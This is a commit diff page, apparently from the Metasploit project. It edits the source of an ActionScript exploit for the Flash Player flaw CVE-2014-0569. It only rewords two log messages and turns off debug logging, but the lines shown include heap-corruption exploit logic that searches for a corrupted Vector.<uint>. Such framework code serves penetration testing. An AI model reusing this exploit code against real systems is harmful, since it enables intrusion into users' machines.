File tree Expand file tree Collapse file tree 3 files changed +3
-3
lines changed
data/exploits/CVE-2014-0569
external/source/exploits/CVE-2014-0569 Expand file tree Collapse file tree 3 files changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -66,7 +66,7 @@ package
66
66
try {
67
67
var uint_vector_pos: uint = search_uint_vector()
68
68
} catch (err: Error ) {
69
- Logger. log ("Vector.<uint> not found :( " )
69
+ Logger. log ("[!] Exploit - Corrupted Vector.<uint> not found" )
70
70
return
71
71
}
72
72
@@ -76,7 +76,7 @@ package
76
76
for (i = 0 ; i < ov. length ; i++ ) {
77
77
if (ov[ i] . length > 1024 ) {
78
78
uv = ov[ i]
79
- Logger. log ("Vector.<uint> corrupted found :) " )
79
+ Logger. log ("[*] Exploit - Corrupted Vector.<uint> found" )
80
80
} else {
81
81
ov[ i] = null
82
82
}
Original file line number Diff line number Diff line change 3
3
import flash.external.ExternalInterface
4
4
5
5
public class Logger {
6
- private static const DEBUG : uint = 1
6
+ private static const DEBUG : uint = 0
7
7
8
8
public static function alert (msg :String ):void
9
9
{
You can’t perform that action at this time.
0 commit comments